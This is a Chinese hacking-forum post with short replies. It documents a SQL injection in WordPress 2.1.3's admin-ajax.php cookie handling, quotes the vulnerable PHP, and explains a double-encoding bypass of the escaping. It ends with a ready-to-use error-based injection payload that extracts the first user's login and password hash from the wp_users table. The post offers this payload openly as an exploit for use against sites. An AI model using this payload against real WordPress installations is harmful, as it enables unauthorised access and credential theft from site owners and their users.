查看: 39695|回复: 4

[文章] 记录一个WordPress 2.1.3注入

[复制链接]
发表于 2016-11-3 18:50:38 | 显示全部楼层 |阅读模式
本帖最后由 Free_小东 于 2016-11-3 18:54 编辑

---------------------------------------------------------------------------------------------------------------
*                                                                                                                                                                 *
*                                本文来自08内部分享,未经允许,不得转载.                     *
*                                                                                                                                                                *
---------------------------------------------------------------------------------------------------------------


网站程序用的是 WordPress 2.1.3 ,于是我就在网上搜了漏洞 发现了个 sql注入
链接:http://www.bitscn.com/network/security/200709/110036.html
文章里给了个盲注exp 不好使 没几次暴出来的密码都使不一样 囧.
决定还是自己动手吧 然后看了下文章里的分析

[PHP] 纯文本查看 复制代码
function check_ajax_referer() {
$cookie = explode('; ', urldecode(empty($_POST['cookie']) ?
$_GET['cookie'] : $_POST['cookie'])); // AJAX scripts must pass
cookie=document.cookie
foreach ( $cookie as $tasty ) {
if ( false !== strpos($tasty, USER_COOKIE) )
$user = substr(strstr($tasty, '='), 1);
if ( false !== strpos($tasty, PASS_COOKIE) )
$pass = substr(strstr($tasty, '='), 1);
}
if ( !wp_login( $user, $pass, true ) )
die('-1')





我们 通过 strpos($tasty, USER_COOKIE) 和 strpos($tasty, PASS_COOKIE) 的验证就可以了 USER_COOKIE和PASS_COOKIE都是常量
可以看到上图get_option(‘siteurl’)是从数字库中读网站地址 在加一次md5值就可以通过验证了



知道这个后我们来构造下

因为用了urldecode(),我们用%2527来绕过wp做的转义限制

位置代码:
[PHP] 纯文本查看 复制代码
  if ( !$user = $wpdb->get_row("SELECT * FROM $wpdb->users WHERE user_login = '$user_login'") )
            return false;


exp:

[AppleScript] 纯文本查看 复制代码
    /wp-admin/admin-ajax.php
    cookie=wordpressuser_md5(网站url地址)=aa%2527 and(select 1 from(select count(*),concat((select concat(user_login,0x5e,user_pass,0x5e) from wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)– n; wordpresspass_md5(网站url地址)=dddddd



回复

使用道具 举报

发表于 2016-11-3 19:00:29 | 显示全部楼层
666,小东果然厉害

点评

内部分享的  详情 回复 发表于 2016-11-3 19:17
回复 支持 反对

使用道具 举报

发表于 2016-11-3 19:04:16 来自手机 | 显示全部楼层
回复看看大牛作品
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-11-3 19:17:43 | 显示全部楼层

RE: 记录一个WordPress 2.1.3注入

wuyan 发表于 2016-11-3 19:00
666,小东果然厉害

内部分享的  
回复 支持 反对

使用道具 举报

发表于 2016-11-6 22:35:28 | 显示全部楼层
东哥  我当你小弟可好 QAQ
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 04:18 , Processed in 0.026587 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部